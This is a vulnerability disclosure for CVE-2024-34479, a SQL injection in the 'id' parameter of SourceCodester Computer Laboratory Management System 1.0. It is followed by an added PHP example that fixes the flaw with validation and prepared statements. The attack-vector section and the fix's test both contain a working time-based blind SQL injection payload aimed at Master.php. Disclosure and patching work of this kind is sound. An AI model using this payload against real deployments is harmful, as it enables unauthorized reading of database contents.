# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (Master.php) - SQL Injection
# Date: 05 May 2024
# Exploit Author: Kavia Baskar
# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html
# Version: v1.0
# CVE: CVE-2024-34479
# Tested on: Windows, XAMPP, Apache, MySQL


 [Suggested description]
 SourceCodester Computer Laboratory Management System 1.0 allows classes/Master.php id
 SQL Injection.

 ------------------------------------------

 [Vulnerability Type]
 SQL Injection

 ------------------------------------------

 [Vendor of Product]
 SourceCodester

 ------------------------------------------

 [Affected Product Code Base]
 SourceCodester Computer Laboratory Management System - 1.0

 ------------------------------------------

 [Affected Component]
 The functionality allowing users to modify borrowing records information within the application.

 ------------------------------------------

 [Attack Type]
 Local

 ------------------------------------------

 [Impact Code execution]
 true

 ------------------------------------------

 [Impact Denial of Service]
 true

 ------------------------------------------

 [Impact Information Disclosure]
 true

 ------------------------------------------

 [Attack Vectors]
 To exploit this vulnerability, the following payload can be used on the 'id' parameter of 'http://localhost/php-lms/classes/Master.php?f=save_category' to retrieve data from the database:

 ------WebKitFormBoundaryeubsFzqrWToLg4au
 Content-Disposition: form-data; name="id"

 ' AND (SELECT 6270 FROM (SELECT(SLEEP(5)))jgeq) AND 'QpoF'='QpoF
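
 An added example, not code from the application or from the advisory author: one way to handle the 'id' field so that the value above cannot alter the query, using integer validation plus a prepared statement. The table name category_list, its columns and the function names are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example; category_list, its columns and the function names are assumed,
// not taken from the application. In-memory SQLite stands in for MySQL.

function parse_id(string $raw): int
{
    // Accept only a positive integer; anything else never reaches the database.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    return $id;
}

function update_category(PDO $db, string $rawId, string $name): int
{
    $id = parse_id($rawId);
    // Placeholders keep request data out of the SQL text entirely.
    $stmt = $db->prepare('UPDATE category_list SET name = :name WHERE id = :id');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE category_list (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$db->exec("INSERT INTO category_list (id, name) VALUES (1, 'Keyboards')");

// Legitimate request: one row updated.
echo 'rows updated: ', update_category($db, '1', 'Input devices'), "\n";

// The id value quoted in the advisory, used here as test input for the validator.
$hostile = "' AND (SELECT 6270 FROM (SELECT(SLEEP(5)))jgeq) AND 'QpoF'='QpoF";
try {
    update_category($db, $hostile, 'x');
    echo "hostile id accepted\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// The stored row reflects only the legitimate update.
echo $db->query('SELECT name FROM category_list WHERE id = 1')->fetchColumn(), "\n";
```

 The same prepare-and-bind pattern applies with mysqli or PDO against MySQL; the integer check is a second layer, not a substitute for the bound parameter.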

 ------------------------------------------

[Reference]
 https://www.strongboxit.com/

[Discoverer]
Kavia Baskar with StrongBox IT